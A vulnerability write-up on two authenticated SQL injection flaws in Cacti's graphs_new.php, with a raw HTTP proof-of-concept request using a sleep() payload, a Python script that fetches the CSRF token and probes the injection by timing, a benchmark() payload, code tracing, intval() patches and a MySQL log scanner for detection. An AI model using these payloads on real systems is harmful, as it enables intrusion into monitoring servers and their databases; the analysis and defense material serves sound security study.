Cacti /graphs_new.php SQL Injection Vulnerability

Contents

1. Vulnerability description
2. Trigger conditions
3. Affected scope
4. Code analysis
5. Defense
6. Offensive and defensive thoughts

1. Vulnerability description

Another SQL injection vulnerability via graphs_new.php in Cacti was found and reported as bug http://bugs.cacti.net/view.php?id=2652. That entry covers two separate flaws in the same file: the cg_g POST parameter reaches a query with no escaping beyond a loose "> 0" comparison, and the selected_graphs_array POST parameter is passed to unserialize(), after which its array keys are concatenated into a second query. Both require an authenticated session.

Relevant Link:

http://bobao.360.cn/snapshot/index?id=146936

2. Trigger conditions

0x1: POC1: SQL injection (time-based blind, via cg_g)

POST /cacti/graphs_new.php HTTP/1.1
Host: 192.168.217.133
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.217.133
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://192.168.217.133/cacti/graphs_new.php?host_id=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2
Content-Length: 189

__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save
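The request above only works because cg_g is guarded by a loose numeric comparison and the session carries a fresh csrf-magic token. The following script, added here as an example and not part of the original post or of Cacti, shows the three moving parts: pulling the __csrf_magic token out of a fetched page, modelling why a string that merely starts with digits passes "> 0", and turning the sleep() payload into a timing oracle. The target URL, cookie and the sample HTML are assumptions for a lab host; the token value in the sample is made up.

```python
import re
import time
import urllib.request
from urllib.parse import urlencode

# Constructed sample of the hidden field that csrf-magic adds to every form on
# graphs_new.php; the token value is made up for this example.
SAMPLE_HTML = """<form method='post' action='graphs_new.php'>
<input type='hidden' name='__csrf_magic' value='sid:ed226a87fdcc8e055d1c27b620e564d629d95e40,1450241184' />
</form>"""

TOKEN_RE = re.compile(r"""name=['"]__csrf_magic['"]\s+value=['"]([^'"]+)['"]""")


def extract_csrf_token(html):
    """Return the __csrf_magic value from a fetched graphs_new.php page, or None."""
    m = TOKEN_RE.search(html)
    return m.group(1) if m else None


# Leading numeric prefix, as PHP 5/7 read it when comparing a string with an int
# (PHP 8 compares such strings as strings instead, and the guard still passes).
_NUM_PREFIX = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")


def php_numeric_prefix(s):
    """Model the string-to-number conversion behind '$_POST["cg_g"] > 0':
    only the leading numeric prefix counts, the rest of the string is ignored,
    so '033926697 xor (...)' compares as 33926697."""
    m = _NUM_PREFIX.match(s)
    return float(m.group(0)) if m else 0.0


def passes_cg_g_guard(value):
    """The only check form_save() applies to cg_g before it reaches the query."""
    return php_numeric_prefix(value) > 0


def build_poc1_body(csrf_token, host_id, delay):
    """x-www-form-urlencoded body of POC1 with a configurable sleep() delay."""
    cg_g = "033926697 xor (select(0)from(select sleep(%d))v)" % delay
    assert passes_cg_g_guard(cg_g), "payload would be rejected by the > 0 guard"
    return urlencode({
        "__csrf_magic": csrf_token,
        "cg_g": cg_g,
        "save_component_graph": "1",
        "host_id": str(host_id),
        "host_template_id": "0",
        "action": "save",
    })


def probe_time_based(send, csrf_token, host_id, delay=5, margin=0.8):
    """send(body) must return the elapsed seconds of one POST. Compare a
    sleep(0) baseline against sleep(delay); the gap is attributable to the
    injected sleep() only if it is close to the requested delay."""
    baseline = send(build_poc1_body(csrf_token, host_id, 0))
    delayed = send(build_poc1_body(csrf_token, host_id, delay))
    return (delayed - baseline) >= delay * margin


def make_sender(base_url, cookie, timeout=30):
    """Real sender for a lab target (base_url and cookie are assumptions):
    POSTs the body with the logged-in session cookie and times the round trip."""
    def send(body):
        req = urllib.request.Request(
            base_url + "/graphs_new.php",
            data=body.encode(),
            headers={"Cookie": cookie,
                     "Content-Type": "application/x-www-form-urlencoded"},
        )
        start = time.monotonic()
        try:
            urllib.request.urlopen(req, timeout=timeout).read()
        except Exception:
            pass  # a redirect or error page still reflects the query's run time
        return time.monotonic() - start
    return send


def simulated_sender(body):
    """Test double: reads sleep(N) back out of the encoded body and reports
    N seconds plus a little overhead, without touching a network."""
    m = re.search(r"sleep%28(\d+)%29", body)
    return int(m.group(1)) + 0.05
```

Against a real host the flow is: GET graphs_new.php with the session cookie, extract_csrf_token() on the response, then probe_time_based(make_sender(base, cookie), token, host_id). Because csrf-magic binds the token to the session id, a token copied from another session is rejected, which is why the PoC has to include both the Cacti cookie and a matching __csrf_magic value.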

0x2: POC2: object injection (unserialize) leading to SQL injection

1. Log in.
2. POST http://target/cacti/graphs_new.php
   Data: __csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=1&host_id=1&selected_graphs_array=[injection]
   {Injection exp can be found on my server: http://pandas.pw/cacti.exp}
3. MySQL log: select graph_template_id from snmp_query_graph where id=1 and benchmark(20000000,sha1(1))--

3. Affected scope
4. Code analysis

0x1: Vuln-1: object injection leading to SQL injection

/graphs_new.php

/* set default action */
if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = ""; }
switch ($_REQUEST["action"]) {
    case 'save':
        // action=save: both PoCs enter through form_save()
        form_save();

        break;
    case 'query_reload':
        host_reload_query();

        header("Location: graphs_new.php?host_id=" . $_GET["host_id"]);
        break;
    default:
        include_once("./include/top_header.php");

        graphs();

        include_once("./include/bottom_footer.php");
        break;
}

Tracing into form_save():

function form_save()
{
    ..
    if (isset($_POST["save_component_new_graphs"]))
    {
        // save_component_new_graphs=1 selects this branch: host_new_graphs_save()
        host_new_graphs_save();

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }
}

Tracing into host_new_graphs_save():

function host_new_graphs_save()
{
    // $selected_graphs_array is whatever the client put in the POST parameter,
    // passed through stripslashes() and unserialize() with no validation at all
    $selected_graphs_array = unserialize(stripslashes($_POST["selected_graphs_array"]));
    ..
    // the unserialized value is walked as a three-level array and its keys are
    // concatenated into this query, so an attacker-controlled key is SQL injection
    $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);
    ..
}

0x2: Vuln-2: SQL injection via cg_g

function form_save()
{
    if (isset($_POST["save_component_graph"]))
    {
        /* summarize the 'create graph from host template/snmp index' stuff into an array */
        while (list($var, $val) = each($_POST))
        {
            if (preg_match('/^cg_(\d+)$/', $var, $matches))
            {
                // cg_<n>: the regex forces the id to be digits only
                $selected_graphs["cg"]{$matches[1]}{$matches[1]} = true;
            }
            // cg_g is not filtered: the value, not the name, becomes the array key
            elseif (preg_match('/^cg_g$/', $var))
            {
                // loose comparison: a string that merely starts with digits passes,
                // whatever SQL follows the digits
                if ($_POST["cg_g"] > 0)
                {
                    $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;
                }
            }
            elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches))
            {
                $selected_graphs["sg"]{$matches[1]}{$_POST{"sgg_" . $matches[1]}}{$matches[2]} = true;
            }
        }

        if (isset($selected_graphs))
        {
            // external input flows into host_new_graphs()
            host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);
            exit;
        }

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }

    if (isset($_POST["save_component_new_graphs"])) {
        host_new_graphs_save();

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }
}

Tracing into host_new_graphs():

function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
    /* we use object buffering on this page to allow redirection to another page if no
    fields are actually drawn */
    ob_start();

    include_once("./include/top_header.php");

    print "<form method='post' action='graphs_new.php'>\n";

    $snmp_query_id = 0;
    $num_output_fields = array();

    while (list($form_type, $form_array) = each($selected_graphs_array)) {
        while (list($form_id1, $form_array2) = each($form_array)) {
            if ($form_type == "cg") {
                // $form_id1 is the raw cg_g value; it is used as graph_template_id
                // without escaping or casting, so the SQL below is injectable
                $graph_template_id = $form_id1;

                html_start_box("<strong>Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "3", "center", "");
                ..

Relevant Link:

http://seclists.org/fulldisclosure/2015/Dec/att-57/cacti_sqli%281%29.txt
http://bugs.cacti.net/view.php?id=2652

5. Defense

/graphs_new.php

function host_new_graphs_save()
{
    ..
    /* before: $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]); */
    // fix: the key is cast to an integer before it is concatenated into the query
    $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . intval($snmp_query_array["snmp_query_graph_id"]));
    ..
}

/graphs_new.php

function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
    /* we use object buffering on this page to allow redirection to another page if no
    fields are actually drawn */
    ob_start();

    include_once("./include/top_header.php");

    print "<form method='post' action='graphs_new.php'>\n";

    $snmp_query_id = 0;
    $num_output_fields = array();

    while (list($form_type, $form_array) = each($selected_graphs_array)) {
        while (list($form_id1, $form_array2) = each($form_array)) {
            if ($form_type == "cg") {
                $graph_template_id = $form_id1;
                // fix: cast to an integer before it reaches the query; the PoC value
                // "033926697 xor (...)" collapses to 33926697 and the xor clause is dropped
                $graph_template_id = intval($graph_template_id);

                html_start_box("<strong>Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "3", "center", "");
                ..

Relevant Link:

http://www.cacti.net/download_cacti.php
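The intval() fix has a useful side effect for detection: after patching, the two queries above can only ever reach the database as "where id=<integer>". Anything else in that position on graph_templates or snmp_query_graph is either an unpatched instance under attack or a forged query. The scanner below, added here as an example and not part of the original post or of Cacti, applies exactly that check to MySQL general log lines; the log excerpt is constructed for the example in the MySQL 5.7 general log layout and mixes normal requests with the two PoC queries from this page.

```python
import re

# Constructed MySQL 5.7 general log excerpt (timestamp, connection id, command, SQL).
SAMPLE_LOG = """\
2015-12-16T05:26:24.101010Z\t   12 Query\tselect name from graph_templates where id=7
2015-12-16T05:26:31.202020Z\t   12 Query\tselect name from graph_templates where id=033926697 xor (select(0)from(select sleep(5))v)
2015-12-16T05:27:02.303030Z\t   13 Query\tselect graph_template_id from snmp_query_graph where id=1 and benchmark(20000000,sha1(1))--
2015-12-16T05:27:05.404040Z\t   13 Query\tselect graph_template_id from snmp_query_graph where id=42
"""

QUERY_RE = re.compile(r"^(?P<ts>\S+)\t\s*(?P<conn>\d+) Query\t(?P<sql>.*)$")

# The two queries graphs_new.php builds; the patched code only ever emits
# 'where id=<integer>' for them, so anything else in that position is suspect.
TARGET_RE = re.compile(
    r"\bfrom\s+(graph_templates|snmp_query_graph)\s+where\s+id=(?P<val>.*)$", re.I)
WELL_FORMED_ID = re.compile(r"^\d+\s*$")

# Used only to label a hit with the first injection idiom it contains.
SUSPICIOUS = re.compile(r"sleep\s*\(|benchmark\s*\(|\bxor\b|--|/\*|\bunion\b", re.I)


def classify_query(sql):
    """None if the statement is not one of the two graphs_new.php queries,
    'ok' if its id is a bare integer, otherwise 'injected'."""
    m = TARGET_RE.search(sql)
    if not m:
        return None
    return "ok" if WELL_FORMED_ID.match(m.group("val")) else "injected"


def scan_general_log(text):
    """Return one record per flagged Query line: timestamp, connection id,
    the table touched, the first injection keyword seen (if any) and the SQL.
    Connect/Quit lines and anything that is not a Query are skipped."""
    hits = []
    for line in text.splitlines():
        m = QUERY_RE.match(line)
        if not m:
            continue
        sql = m.group("sql")
        if classify_query(sql) != "injected":
            continue
        table = TARGET_RE.search(sql).group(1)
        kw = SUSPICIOUS.search(sql)
        hits.append({
            "ts": m.group("ts"),
            "conn": int(m.group("conn")),
            "table": table,
            "keyword": kw.group(0) if kw else None,
            "sql": sql,
        })
    return hits


if __name__ == "__main__":
    for hit in scan_general_log(SAMPLE_LOG):
        print("%(ts)s conn=%(conn)d table=%(table)s keyword=%(keyword)s\n    %(sql)s" % hit)
```

The general log is too expensive to leave on in production; the same classify_query() check applied to the slow query log catches the time-based variants (sleep() and benchmark() both push a query over a low long_query_time), and the connection id lets the SOC tie a hit back to the Cacti session that issued it.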

6. Offensive and defensive thoughts

Copyright (c) 2016 Little5ann All rights reserved

Time: 2024-08-15 00:24:37
